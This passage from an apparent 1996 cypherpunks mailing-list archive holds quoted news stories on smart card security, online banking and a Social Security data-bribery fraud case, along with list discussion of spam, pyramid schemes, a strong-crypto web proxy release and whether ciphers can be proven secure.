MasterCard and Visa (EMV) standards as well as International Standards
Organization specifications, he adds. Micro Card also is partnering with
Redmond, Wash.-based Microsoft and several smart card vendors to
develop integration standards for smart cards and personal computers. 
 
 
 
Evening Standard (London): Monday, November 18, 1996
 
Smart Card Code is Cracked
 
By Flora Hunter 
 
A Cambridge scientist has broken the smart card code, casting doubt over
the card's future as the ultimate security device. 
 
Dr Ross Anderson's work, published today, has been kept secret for six
months to allow institutions such as the Bank of England to review
security. 
 
The Cambridge University computer expert claims his methods of accessing
information from smart cards, which were previously thought impenetrable,
could be used by organised criminals using simple equipment. 
 
He is warning banks and other financial institutions to rethink their
security
operations, as his breakthrough could lay bare the private financial
secrets of
everyone from governments to the holders of High Street bank accounts.
 
Smart cards are used as identity tokens in satellite TV cards and bank
cards.
They are also used as top-level security passes at nuclear installations.
The
Government recently announced plans to store information such as driving
licence, tax, social security and pension details on individual smart
cards. 
 
Today, Dr Anderson said: 'For a number of years these smart cards and
processors have been marketed as tamper-proof. If you try and get into
their
chip using whatever method, they are supposed to be inaccessible. 
 
'We have developed techniques that can get into most of these smart cards
and I believe they can all be accessed. Banks are moving away from
magnetic cards towards smart cards to improve security but they are going
to
have to think again. 
 
'They are going to have to rethink their whole security process because
we
have shown the security processors can be attacked with the kind of
equipment available to any undergraduate. 'Organised criminals could use
the
techniques to cause disaster to financial institutions.' 
 
Smart cards can store information on a tiny microchip embedded in the
plastic which lets the user access electronic and computer systems. 
 
Banks and other financial institutions must now make immediate changes to
their sophisticated security systems, which could cost millions of
pounds. 
 
In conjunction with an American colleague, Dr Anderson has perfected
techniques that could cause havoc. 
 
Dr Anderson said: 'We have been in consultation with the Bank of England
and various national intelligence agencies. We agreed to postpone
publishing
our paper to give them a chance to look at the findings. A lot of people
have
put all their eggs in one basket by relying on smart cards for security.
Now
the basket has been tipped over.' 
 
 

American Banker: Thursday, November 21, 1996
 
Wells, 31 Others Ease Downloading of Account Data from
Internet 
 
By DREW CLARK
 
Wells Fargo & Co. and 31 community banks and credit unions announced
that their customers will be able to download account information from
the
Internet with the click of a button. The technology is one of the first
uses of
Microsoft Corp.'s set of standards for electronic financial connections,
which
were introduced last March. 
 
Called Active Statement Technology, advocates say that it will simplify
the
process of transferring account files from the World Wide Web to personal
financial software programs. 
 
Making data on Web sites easier to download is likely to
encourage banking customers to go to the sites, industry
observers said. That, in turn, would offer banks more
chance to promote their services on the Internet. 
 
"Today we offer both our Quicken and our Microsoft Money customers the
ability to download information into their software spreadsheets," said
Wells
Fargo spokeswoman Janet Otsuki. But the features of Microsoft's new
technology "will allow Money customers to have a more direct and more
efficient downloading experience." 
 
The benefits of that arrangement are hardly accidental from the
standpoint of
Microsoft, which has been aggressively battling Intuit Inc. for a greater
share
of the personal financial software market. Intuit's Quicken leads Money
by
75% to 20%, according to a recent independent consumer study. 
 
Microsoft offers its technology for free to all financial institutions,
and it
encourages banks to link their Web sites so that their customers will
find a
trial offer for the Money product. 
 
Competing Web browsers will be able to download financial data, but

Microsoft Money 97 is the only financial software able automatically to
receive the information.
 
"We expect this will be a de facto technology that any bank would want to
incorporate," said Matthew Cone, a business development manager at
Microsoft. 
 
Others familiar with Active Statement Technology said the program's
ability
to recognize information that has already been recorded offers a crucial
advantage over the widely used Quicken Import Format. 
 
"Comparing the Quicken Import Format to (Microsoft's technology) is like
comparing apples to oranges," responded Intuit senior vice president Eric
Dunn. "Automatic reconciling has been possible in both Quicken and Money
for over a year." 
 
By now, 275 financial institutions offer some form of PC banking, and 46
let
customers gain access to their accounts from the Web, according to the
Seattle-based Online Banking Report. But encouraging customers to come
over via the Web may hold benefits for banks. 
 
"Instead of starting with Money or Quicken, customers start at the bank's
Web site," said Paul Fiore, chief executive of Digital Insight. 
 
The Camarillo, Calif., company has helped 28 credit unions develop
transactional Web sites. Without having to pay Microsoft for a direct
connection, all those institutions now offer their customers the ability
to
download their finances easily into Money 97. 
 
How soon will that affect consumers at those institutions? Cathi
Cavanagh,
home banking coordinator at the Plano, Tex., Community Credit Union, is
already watching: "I am personally going to look to see if people are
converting from Quicken to Microsoft Money." 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeffrey A Nimmo <janimmo@rigel.infonex.com>
Date: Mon, 25 Nov 1996 12:02:32 -0800 (PST)
To: EBDAVIS@aol.com
Subject: Re: Fwd: Your Email Privacy Has Been Compromised
In-Reply-To: <961125072341_805751587@emout02.mail.aol.com>
Message-ID: <Pine.SOL.3.91.961125112659.29484A-100000@rigel.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 25 Nov 1996 EBDAVIS@aol.com wrote:

> From:	securityadmn@netsecurity.yes

I'm going to take a wild stab in the dark and say that this is
a forged e-mail address.

> In my program you'll learn:
> 
> *How to send email that cannot be traced.

Well, I for one hope he doesn't just mean forging the "From:"
header like he did above.

> My package is a treasure trove of valuable information collected 
> to guarantee your privacy!

"Guarantee?" I didn't think that was possible. I know it's possible
to make it so difficult to read your mail that it wasn't worth the
bother.

> This is the first time I am making this information available.  In a 
> short while, the program will be retailing for $59.95.  However, if 
> you respond within the next 7 days of receiving this message you 
> will receive the special price of $19.95.  Because of the amazing 
> expansion of the internet, I have decided to make this offer so 
> that everyone can afford to learn how to protect themselves from 
> the net's growing criminal element.  After seven days you may 
> still order the program at its retail price of $59.95.

Well, if he's for real (which I doubt), and he gives detailed
instructions for the newbie on how to set up PGP on all
platforms, Premail, Mixmaster, the nym servers, the anonymizer,
etc., then it might be worth it to some people. However, I found
that doing it the hard way (trial and error), was not only
cheaper, but helped me understand the programs better.

> Additionally, if you order within the next 48 hours, I'll include a 
> very special report about how you can get a free email address 
> and account to use from just about anywhere in the U.S.  I'll 
> show you how, but you must order within the next 48 hours!

I hope he's not referring to the nym servers, as they aren't
real accounts.

> Please be certain to give me your
> email address when ordering.  I prefer to ship orders via email
> so that you can have my information as soon as possible.

I wonder if it might just be a case of:

"Okay, here's your PGP FAQ, nym FAQ, Mixmaster FAQ, Anonymity
FAQ, and anonymizer URL. Thanks for the twenty bucks! See ya'!"

> To order send a check, money order, or credit card information
> (Visa, MasterCard, Discover) to me at:

But what about all the evil postman who are just waiting for
you to send your credit card number through the mail? And I thought
he was concerned about our security?

> Copyright 1996, Jeff Martin.  All rights reserved.

What's he copyrighting? His e-mail message or his credit
card form?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lile Elam <lile@art.net>
Date: Mon, 25 Nov 1996 12:13:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: Where do I send this to get them stopped?
Message-ID: <199611252010.MAA24298@art.net>
MIME-Version: 1.0
Content-Type: text/plain


Hi all,

How can we stop such aweful programs? Is there a group I
can send this to who trouble shoots spam?

thanks,

-lile
(a webmaster@art.net)


----- Begin Included Message -----

>From 10ehnmugs6l6@MAIL-CLUSTER.PCY.MCI.NET Sun Nov 24 11:40:48 1996
Date: Sun, 24 Nov 1996 12:45:02 +0000
From: Emerald@earthstar.com
Subject: FREE demo
To: Emerald11249601@MAIL-CLUSTER.PCY.MCI.NET
Reply-to: Emerald@earthstar.com
MIME-version: 1.0
X-Mailer: Pegasus Mail for Windows (v2.32)
Content-Type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Priority: normal
Comments: Authenticated sender is <10ehnmugs6l6@mail14.MCI2000.com>
Content-Length: 175

Are you interested in sending bulk e-mails?
I know of a great new program!
You can even test out the demo for FREE!
Send me an e-mail for more details.

Emerald@earthstar.com


----- End Included Message -----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Mon, 25 Nov 1996 12:24:14 -0800 (PST)
To: Clay Olbon II <clay.olbon@dynetics.com>
Subject: Re: Pyramid schemes and cryptoanarchy
Message-ID: <1.5.4.32.19961125201114.003a831c@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:23 AM 11/10/96 -0500, clay.olbon@dynetics.com wrote:
>It seems that pyramid scheme spamming has increased of late (if that is
>possible!).  In my lifetime, I can only remember a single snail-mail
>instance of a pyramid scheme - over the net it is an entirely different
>story (although the number of instances is probably proportional to the
>number of lists I subsribe to).  With fully anonymous digital cash will come
>the ability to develop untraceable pyramid schemes.  As a staunch believer
>in the free market, I find laws against these schemes distasteful, quite
>hypocrytical (i.e. Social Security), and soon to be unenforceable.

Aside from illegality, snail-mail pyramid spamming is rare because it costs
enough money per piece of mail that it's hard to make money given the
fraction of recipients who are both suckers and not too lazy to respond.
Email, on the other hand, is cheap, and sending large quantities is easy.
So you can expect to see a lot more email pyramid spamming, and electronic
money, whether digicash or traceable, will make it more popular.

On the other hand, I don't see anonymity helping it much - to the extent
that the public understands it, they'll realize that the people higher
up on the pyramid may all be tentacles, and they've got to mail out 
an address that's "theirs" to collect any money from lower-down suckers.
Dealing with complexity tends to encourage clues, or at least delay,
which is death for most pyramid scams.  Pyramid schemes benefit more from
traceable cash and non-anonymous suckers who can be targeted for later scams.

Multi-level marketing reacts interestingly with the Internet.
Where it's relatively legitimate, rather than a scam, it's a scaleable way 
for a company to hire a bunch of sales people that grows about as fast as the
sales of the product, who don't have to be paid if sales drop off,
and pay for advertising through sales people and word-of-mouth rather than 
expensive broadcasting.  The Internet and electronic communication in general
encourage small, flexible niche businesses that grow, sell stuff, and close.
So MLM is useful for them, especially if their product is physical stuff
rather than bits, and lower transaction costs make it easier to pay
the sales people (either anonymously or taxably....)

On the other hand, lower transaction costs make it easy to broadcast and
deliver information to potential customers and deliver stuff by NextDayAir,
and of course you can deliver bits for almost-free.  So MLM probably won't
work well for commodities with competing suppliers, like phone cards, soap, 
and high-tech motor oil, but may survive for products where personal
recommendations are important, like Super Blue-Green Algae and Smart Drugs, 
(where the sales rep and customer know each other and anonymity at most
keeps out greedy tax collectors and meddling FDA censors)
or where the sales person performs some useful part of the process,
like made-to-measure lingerie or direct personal loan collections.



#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
#     (If this is posted to cypherpunks, I'm currently lurking from fcpunx,
#     so please Cc: me on replies.  Thanks.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.net>
Date: Mon, 25 Nov 1996 12:12:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: SAFEPASSAGE BRINGS STRONG CRYPTO TO WEB BROWSERS WORLDWIDE
Message-ID: <199611252011.MAA27220@clotho.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


For Release November 25, 1996
C2Net Contact: Douglas Barnes, +1 510 986 8770
UK Web Contact: Dave Williams, +44 0113 222 0046 


      SAFEPASSAGE BRINGS STRONG CRYPTO TO WEB BROWSERS WORLDWIDE

Oakland, CA -- C2Net and UK Web, Ltd., announced today the beta
release of a new product, "SafePassage Web Proxy." International users
of popular web browsers such as Netscape or Microsoft Internet
Explorer can use SafePassage to make secure web connections using
full-strength cryptography.  Prior to this release, international
users of these browsers had to use weak cryptography, which could be
easily broken.

"SafePassage is the perfect complement to our Stronghold web server,"
said Mark Cox, Stronghold Product Manager for UK Web. "we've been
marketing the international version of Stronghold with full strength
cryptography for two months now, but we knew we would need matching
strong cryptography on the browser side as well. SafePassage Web Proxy
answers this need."

SafePassage provides secure connections using strong cryptography for
any browser that supports standard SSL tunneling. It currently runs on
Windows 3.1 and Windows 95.

"We don't believe in using codes so weak that foreign governments,
criminals or bored college students can break them," said C2Net
President Sameer Parekh, "we also oppose plans to put all your
cryptography keys in a few places, where they can be sold to the
highest bidder by traitors like Aldrich Ames, or recent suspect Harold
J. Nicholson."

Current "export" versions of Netscape and MSIE use a weak cipher that
has been broken by online groups, such as the "Cypherpunks." Companies
like HP and IBM, bowing to government pressure, have been promoting
seemingly innocuous "key recovery" plans that would require
centralized key storage and easy government access to -- or abuse of
-- cryptography keys.

Beta versions of SafePassage can be downloaded at no cost from UK
Web's site at: http://stronghold.ukweb.com/safepassage. It is
currently unavailable for distribution within the US and Canada, but a
domestic version will be made available in the near future.

The final release will be free for personal, educational, or other
non-commercial use; for information on site licenses and bundling,
send e-mail to safepassage@c2.net; or by phone, contact Douglas Barnes
at +1 510 986 8773, or Dave Williams at +44 0113 222 0046.

UK Web Limited is a leading Internet services company specialising in
server technology, Internet security, business solutions and effective
site design.

C2Net is the leading provider of uncompromising security on the
Internet.  C2Net provides a wide array of Internet privacy services
and powerful network security software.

Netscape Navigator and Netscape Enterprise are trademarks of Netscape
Communications Corporation. Microsoft Internet Explorer and Microsoft
Internet Information Server are trademarks of Microsoft Corporation.
Stronghold and SafePassage are trademarks of C2Net.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alzheimer@juno.com (Ronald Raygun Remailer)
Date: Mon, 25 Nov 1996 09:14:52 -0800 (PST)
To: cypherpunks@toad.com
Subject: Copyright violations
Message-ID: <19961125.111418.12159.4.alzheimer@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


[This should make you feel better about GAK]


New York Times: Thursday, November 21, 1996
 
Social Security Workers Held In Frauds Using Credit Cards
 
By LYNDA RICHARDSON
 
Federal officials announced the arrests of a group of Social Security
Administration employees Wednesday, charging them with passing

confidential information on at least 1,000 people to credit-card thieves
for
bribes as little as $10. 
 
Under the scheme, the employees would give out confidential information
that
would allow the credit-card thieves to use the cards when they made
purchases. The authorities think the thieves were able to obtain the
cards by
stealing them through the mail, in some cases.
 
The authorities said six current or former employees and a former
security
guard with the agency were arrested Tuesday in the scheme, which resulted
in at least $10 million in losses to credit card issuers from October
1995 to
this June. The credit card issuers are Citibank, Visa and Mastercard. 
 
The employees were charged with bribery and misuse of a government
computer, and face prison terms of 2 to 15 years and fines up to
$250,000. 
 
The arrests resulted from a federal investigation that began in February
into
what computer experts say may be one of the biggest breaches of security
of
federal government data on residents. 
 
Officials said 20 people have been arrested, including 10 current or
former
employees of the Social Security Administration. The scheme was first
detected in February by Citibank, which noticed an unusual amount of
fraudulent charges on credit cards it had mailed to customers but that
the
customers said they had not received, officials said. 
 
Like many banks, Citibank has a security procedure that requires
customers
who receive new cards to activate them by calling a toll-free telephone
number and provide some personal information, like their mother's maiden
name, to activate the credit card. 
 
The bank discovered that its security system had been foiled in dozens of
cases in which cards were activated by someone who was not the cardholder
but had access to the cardholder's mother's maiden name. 
 
Investigators for the Social Security Administration, which keeps files
of
maternal maiden names and records the identification number of employees
who call up files, determined that an employee at the Brooklyn Social
Security office had illegally looked at the personal records of nearly
two
dozen people and sold the information to conspirators, who activated
credit
cards, said Philip A. Gambino, an agency spokesman. 
 
Based on information from that employee, the agency identified several
other
employees who had illegally released confidential information, often in
exchange for bribes. Those arrested this week were described as low-level
workers, including claim representatives and clerks. 
 
In 1,000 cases, credit cards were activated using information illegally
provided by the government employees, Gambino said. 
 
``Most have been fired and the others are in the process of being
fired,'' he
said. 
 
Officials said the thieves who approached the Social Security employees
already had access to Social Security numbers and wanted the numbers run
through the agency's database. Social Security numbers are the closest
thing
to a universal identifier that Americans have, and are widely available
from
public sources like college and employee ID cards and hospital tags, and
even driver's licenses in more than 30 states. 
 
The investigation has resulted in the arrests of nine people, including
seven
Nigerians, who are accused of receiving or using the stolen confidential
information to commit various types of credit card fraud, said Brian F.
Gimlett, the special agent in charge of the Secret Service in New York. 
 
He said the stolen or reissued credit cards were used to buy merchandise,
obtain cash advances and line-of-credit checks and make illegal
withdrawals
from automated teller machines. 
 
Gimlett said the conspirators who approached the government workers were

not part of an organized crime ring. 
 
``Actually, most were individual operations, but doing the same type of
crime,'' he said. ``This is another example of greedy people finding new
ways
to compromise the security systems to financially gain from credit card
fraud
and other types of fraud.'' 
 

 
EFT Report: November 20, 1996
 
Micro Card Targets U.S. Smart Card Market
 
Bull CP8 Transac, of France, says it wants to help U.S. banks issue smart
cards through its U.S. subsidiary, Micro Card Technologies, of Billerica,
Mass. The company believes that 60 percent of the smart card opportunity
resides here, says Gerald Hubbard, vice president of marketing. That
market
is expected to grow to a total of about $100 million to $200 million by
the
year 2000, according to industry figures. 
 
Debit and stored-value cards are targeted as the first smart-card
applications
to be issued in the United States. 
 
As a result, Micro Card is forming alliances throughout the card industry
to
penetrate the U.S. market. It recently partnered with NBS, of Plainfield,
N.J., one of the nation's largest card manufacturers. 
 
Bull's strategy is similar to that of its competitors, says Ben Miller, 
president
of CardTech/SecurTech in Bethesda, Md. 
 
All the world's major smart card firm are bringing smart card
capabilities in
from offshore and have set up acquisitions or partnerships with U.S. card
manufacturers to build strength and confidence from American bankers,
Miller says. Schlumberger, also of France, recently bought Malco. 
 
The existing manufacturing facilities are secure and card association
compliant, helping the companies earn industry trust. The firms, in turn,
receive an existing revenue stream from the magnetic stripe sales, Miller
says.
 
Micro Card claims it has the longest U.S. history of its competitors. It
set up
shop here in 1984 and has since participated in several smart card
closed-system initiatives. For example, U.S. Marine Corp.'s recruits in
Parris
Island, S.C., receive their pay on CP8 Micro Cards, which are accepted at
post exchanges for cash withdrawals and purchases. Micro Card also has
been selected to provide half of the card readers in the Citibank and
Chase
Manhattan Bank smart card pilot in New York. 
 
Micro Card sells readers, encoders and several different types of cards
ranging from the basic one-issuer, multiple-application system, called
SCOT,
to its high-end electronic purse card that can handle multiple
applications
from several unconnected service providers, says Hubbard. Its crypto card
uses public key cryptography to secure transactions, Hubbard says. 
 

Micro Card's systems all contain microprocessors and comply with Europay,
MasterCard and Visa (EMV) standards as well as International Standards
Organization specifications, he adds. Micro Card also is partnering with
Redmond, Wash.-based Microsoft and several smart card vendors to
develop integration standards for smart cards and personal computers. 
 
 
 
Evening Standard (London): Monday, November 18, 1996
 
Smart Card Code is Cracked
 
By Flora Hunter 
 
A Cambridge scientist has broken the smart card code, casting doubt over
the card's future as the ultimate security device. 
 
Dr Ross Anderson's work, published today, has been kept secret for six
months to allow institutions such as the Bank of England to review
security. 
 
The Cambridge University computer expert claims his methods of accessing
information from smart cards, which were previously thought impenetrable,
could be used by organised criminals using simple equipment. 
 
He is warning banks and other financial institutions to rethink their
security
operations, as his breakthrough could lay bare the private financial
secrets of
everyone from governments to the holders of High Street bank accounts.
 
Smart cards are used as identity tokens in satellite TV cards and bank
cards.
They are also used as top-level security passes at nuclear installations.
The
Government recently announced plans to store information such as driving
licence, tax, social security and pension details on individual smart
cards. 
 
Today, Dr Anderson said: 'For a number of years these smart cards and
processors have been marketed as tamper-proof. If you try and get into
their
chip using whatever method, they are supposed to be inaccessible. 
 
'We have developed techniques that can get into most of these smart cards
and I believe they can all be accessed. Banks are moving away from
magnetic cards towards smart cards to improve security but they are going
to
have to think again. 
 
'They are going to have to rethink their whole security process because
we
have shown the security processors can be attacked with the kind of
equipment available to any undergraduate. 'Organised criminals could use
the
techniques to cause disaster to financial institutions.' 
 
Smart cards can store information on a tiny microchip embedded in the
plastic which lets the user access electronic and computer systems. 
 
Banks and other financial institutions must now make immediate changes to
their sophisticated security systems, which could cost millions of
pounds. 
 
In conjunction with an American colleague, Dr Anderson has perfected
techniques that could cause havoc. 
 
Dr Anderson said: 'We have been in consultation with the Bank of England
and various national intelligence agencies. We agreed to postpone
publishing
our paper to give them a chance to look at the findings. A lot of people
have
put all their eggs in one basket by relying on smart cards for security.
Now
the basket has been tipped over.' 
 
 

American Banker: Thursday, November 21, 1996
 
Wells, 31 Others Ease Downloading of Account Data from
Internet 
 
By DREW CLARK
 
Wells Fargo & Co. and 31 community banks and credit unions announced
that their customers will be able to download account information from
the
Internet with the click of a button. The technology is one of the first
uses of
Microsoft Corp.'s set of standards for electronic financial connections,
which
were introduced last March. 
 
Called Active Statement Technology, advocates say that it will simplify
the
process of transferring account files from the World Wide Web to personal
financial software programs. 
 
Making data on Web sites easier to download is likely to
encourage banking customers to go to the sites, industry
observers said. That, in turn, would offer banks more
chance to promote their services on the Internet. 
 
"Today we offer both our Quicken and our Microsoft Money customers the
ability to download information into their software spreadsheets," said
Wells
Fargo spokeswoman Janet Otsuki. But the features of Microsoft's new
technology "will allow Money customers to have a more direct and more
efficient downloading experience." 
 
The benefits of that arrangement are hardly accidental from the
standpoint of
Microsoft, which has been aggressively battling Intuit Inc. for a greater
share
of the personal financial software market. Intuit's Quicken leads Money
by
75% to 20%, according to a recent independent consumer study. 
 
Microsoft offers its technology for free to all financial institutions,
and it
encourages banks to link their Web sites so that their customers will
find a
trial offer for the Money product. 
 
Competing Web browsers will be able to download financial data, but

Microsoft Money 97 is the only financial software able automatically to
receive the information.
 
"We expect this will be a de facto technology that any bank would want to
incorporate," said Matthew Cone, a business development manager at
Microsoft. 
 
Others familiar with Active Statement Technology said the program's
ability
to recognize information that has already been recorded offers a crucial
advantage over the widely used Quicken Import Format. 
 
"Comparing the Quicken Import Format to (Microsoft's technology) is like
comparing apples to oranges," responded Intuit senior vice president Eric
Dunn. "Automatic reconciling has been possible in both Quicken and Money
for over a year." 
 
By now, 275 financial institutions offer some form of PC banking, and 46
let
customers gain access to their accounts from the Web, according to the
Seattle-based Online Banking Report. But encouraging customers to come
over via the Web may hold benefits for banks. 
 
"Instead of starting with Money or Quicken, customers start at the bank's
Web site," said Paul Fiore, chief executive of Digital Insight. 
 
The Camarillo, Calif., company has helped 28 credit unions develop
transactional Web sites. Without having to pay Microsoft for a direct
connection, all those institutions now offer their customers the ability
to
download their finances easily into Money 97. 
 
How soon will that affect consumers at those institutions? Cathi
Cavanagh,
home banking coordinator at the Plano, Tex., Community Credit Union, is
already watching: "I am personally going to look to see if people are
converting from Quicken to Microsoft Money." 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dana W. Albrecht" <dwa@corsair.com>
Date: Mon, 25 Nov 1996 12:27:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: Provably "Secure" Crypto (was: IPG Algorithm Broken!)
Message-ID: <199611252028.MAA16855@vishnu.corsair.com>
MIME-Version: 1.0
Content-Type: text/plain




Our friend Don Woods seems to have inadvertently sparked what could be a 
useful and serious discussion regarding "provably secure cryptography."

Not to be confused with the usual "unbreakable" snake oil we see peddled 
so often, I refer to systems for which rigorous mathematical proof that 
"there are no shortcuts" exists.  To my knowledge, no such systems, with 
the exception of a real one-time pad, exist today.  However, I also 
under the impression that ongoing research on this topic continues.  For 
example, consider the work being done on "Lattice" cryptosystems (see 
http://jya.com/lattice.htm).

"diGriz" is right.  Nothing precludes the existence of a cryptographic 
algorithm for which a rigorous mathematical proof of "security" exists
--- where "security" means a provable lower bound on the time required 
for recovery of the key.  Indeed, it seems that finding such an 
algorithm --- or providing the necessary rigorous proof for a current 
algorithm --- is a laudable goal of academic cryptographic research.

Rigorous proofs of the non-existence of an algorithm are not new.  
Neither are rigorous proofs that any algorithm which can solve a given 
problem requires a minimal running time.  Or, in an even stronger sense, 
that a particular known algorithm for a given problem is indeed a 
(provably) optimal algorithm for that problem.

For a (non-cryptographic) example of a proof of the first sort --- that 
is, that "there exists no algorithm" --- consider the famous "Halting 
Problem" for Turing machines.  (I believe someone else has also 
mentioned this.)  There are many proofs such as this one, often related, 
though the Halting Problem itself is perhaps the most famous example.

For an (again, non-cryptographic) example of a proof of the second sort 
--- that is, that "any algorithm that solves a given problem requires a 
minimal running time" --- consider the proof that the "minimal" number 
of key comparisons in the worst case required to sort a random list of 
elements for which only an ordering relationship is known is O(nlog(n)).  
See Knuth, Volume 3, section 5.3.  For a simpler example, a standard 
"binary" search which requires O(log(n)) comparisons to find a given 
element in the worst case is provably the optimal algorithm for this 
task.

Turning once again to cryptography, there is presumably an "optimal" 
algorithm for factoring a "general" number in the "worst" case.  Of 
course, known algorithms for factorization seem to regularly improve and 
no one has even suggested that any current algorithm is (provably) the 
"optimal" algorithm.  Worse case bounds on running time for currently 
known algorithms can certainly be produced, but no one currently knows 
if these are the best algorithms.

However, just as one can say, "How do you know that tomorrow some 
brilliant mathematician will not produce a polynomial time factorization 
algorithm?" one can also say, "How do you know that tomorrow some 
brilliant mathematician will not provide a rigorous proof that all 
factorization algorithms --- in the worse case --- require some 
specified minimal running time?"

While the current state of mathematical knowledge suggests that this is 
not likely to happen anytime soon for the factorization problem, it is 
encouraging to see work in areas where more rigorous proofs of security 
are within closer reach.  Again, I refer to work on Lattice problems.  
If the types of rigorous proof regarding "what can't be done" that are 
known for the Halting Problem, sorting, and searching are available for 
cryptographic problems, then this is indeed a major (and laudable) 
advance in cryptography.

Obviously, discussion on this topic is unrelated to such security 
problems as implementation mistakes, fault analysis, outright theft of 
keys, etc.  I hope that I've been careful to explain what I mean by 
"provably secure" and that it's not interpreted to include these types 
of attacks.

I'm interested in the current state of research (if any) on this topic.  
Other than what John Young sent to the list some time ago about Lattice 
stuff --- which is certainly far from prime time --- I've not seen 
anything else.  I also haven't devoted a lot of time to looking.

Relevant pieces of the earlier thread are included below.

Comments, anyone?

Dana W. Albrecht
dwa@corsair.com

----------------------------------------------------------------------------


Eric Murray <ericm@lne.com> writes:
> Don Wood <wichita@cyberstation.net> writes:
> > Do not belive it, it will never happen. It is impossible,  and we can
> > prove it to your satisfaction.
> 
> No, you can't.  It's impossible to prove an algorithim unbreakable.
> You can only say that it hasn't been broken yet, but you can't
> predict the advances in cryptoanalysis.
> 
> If, in two or three years, no one's broken it then maybe it'll seem
> like a reasonably-secure algorithim.  Of course when someone does break
> it you'll just say "oh, that wasn't the real algorithim" like you did
> last time.

[ Snip ]

> You can't prove a negative.  The best IPG could say is that
> it can't be broken with current technology.
> Next week someone might come up with a new way
> to break ciphers that renders the IPG algorithim breakable.
> 
> You point could have been that the same problem exists
> for proofs- that next week someone could come up
> with a way to prove, for all time, that an algorithim
> really IS unbreakable.  So, to cover that posibility
> I should have said "it's currently impossible to
> prove an algorithim unbreakable". :-)

----------------------------------------------------------------------------

"diGriz" anonymously writes: 
> The good news is that you can prove a negative.  For example, it has
> been proven that there is no algorithm which can tell in all cases
> whether an algorithm will stop.

[ Snip ] 

> The best they can say is what they did say: they have a proof that
> their system is unbreakable.  What you question, quite reasonably,
> is whether they have such a proof.

[ Snip ]
 
> Or, more accurately, nobody credible has seen such a proof.  But, a
> clever person might invent one.

----------------------------------------------------------------------------

The Deviant <deviant@pooh-corner.com> writes: 
> No, he was right.  They can't prove that their system is unbreakable.
> They _might_ be able to prove that their system hasn't been broken, and
> they _might_ be able to prove that it is _unlikely_ that it will be, but
> they *CAN NOT* prove that it is unbreakable.  This is the nature of
> cryptosystems.
> 
> > >The best IPG could say is that
> > >it can't be broken with current technology.
> > >Next week someone might come up with a new way
> > >to break ciphers that renders the IPG algorithim breakable.
> > 
> > The best they can say is what they did say: they have a proof that
> > their system is unbreakable.  What you question, quite reasonably,
> > is whether they have such a proof.
> 
> It is impossible to prove such a thing.  It's like saying you have proof
> that you have the last car of a certain model ever to be built.  Anybody
> could come along and build another, and then you don't have the last one.
> 
> > 
> > >You point could have been that the same problem exists
> > >for proofs- that next week someone could come up
> > >with a way to prove, for all time, that an algorithim
> > >really IS unbreakable.  So, to cover that posibility
> > >I should have said "it's currently impossible to
> > >prove an algorithim unbreakable". :-)
> > 
> > Or, more accurately, nobody credible has seen such a proof.  But, a
> > clever person might invent one.
> 
> There *IS NO SUCH PROOF*.  Just like you can't prove that god created the
> universe, or that Oswald shot Kennedy, and so on and so forth.  It can't
> be proven.  It never has been proven, and it never will be proven.  People
> have new ideas, new algorithms are invented.  Someday, somebody will crack
> _all_ the cryptosystems that have now been invented.

[ Snip ]

> diGriz anonymous writes:
> > At 6:56 PM 11/23/1996, The Deviant wrote:
> > >No, he was right.  They can't prove that their system is unbreakable.
> > >They _might_ be able to prove that their system hasn't been broken, and
> > >they _might_ be able to prove that it is _unlikely_ that it will be, but
> > >they *CAN NOT* prove that it is unbreakable.  This is the nature of
> > >cryptosystems.
> > 
> > Please prove your assertion.
> > 
> > If you can't prove this, and you can't find anybody else who has, why
> > should we believe it?
> 
> Prove it?  Thats like saying "prove that the sun is bright on a sunny
> day".  Its completely obvious.  If somebody has a new idea on how to
> attack their algorithm, it might work.  Then the system will have been
> broken.  You never know when somebody will come up with a new idea, so the
> best you can truthfully say is "it hasn't been broken *YET*".  As I
> remember, this was mentioned in more than one respected crypto book,
> including "Applied Cryptography" (Schneier).

----------------------------------------------------------------------------

"diGriz" Anonymously responds:
> Page number?
> 
> Perhaps it would be helpful to hear a possible proof.  If somebody
> were to show that breaking a certain cryptographic algorithm was
> NP-complete, many people would find this almost as good as proof that
> the algorithm is unbreakable.
> 
> Then if a clever person were to show that the NP-complete problems
> were not solvable in any faster way than we presently know how, you
> would have proof that a cryptographic algorithm was unbreakable.
> 
> There is no obvious reason why such a proof is not possible.
> 
> diGriz




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Tue, 26 Nov 1996 15:21:06 -0800 (PST)
To: nobody@cypherpunks.ca
Subject: Re: Provably "Secure" Crypto
In-Reply-To: <199611261737.JAA14215@abraham.cs.berkeley.edu>
Message-ID: <199611251503.PAA00381@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



deGriz wrote:
> At 4:18 AM 11/26/1996, Peter M Allan wrote:
> >That is a bound on a _reliable_ algorithm.  A faster one is to shuffle
> >the elements and present it as sorted.  Lightning fast, but only with
> >low probability of correctness.  That is what we are up against in a key
> >search attack.  The other guy just might guess my 100 bit key first time,
> >millionth time or whatever - early enough anyway.
> 
> >So to get a lower bound you have to show that a lucky guess cannot be
> >distinguished from an unlucky one - and if you do that without a one
> >time pad I take my hat off.
> 
> If the chance of a successful guess is absurdly low, the algorithm can
> be considered to be secure.  It is quite unlikely that you will guess
> a random 128-bit key.  

Agreed.  However you _can_ instantly verify once you have guessed.
This makes the algorithm cryptographically secure, but _not_ perfectly
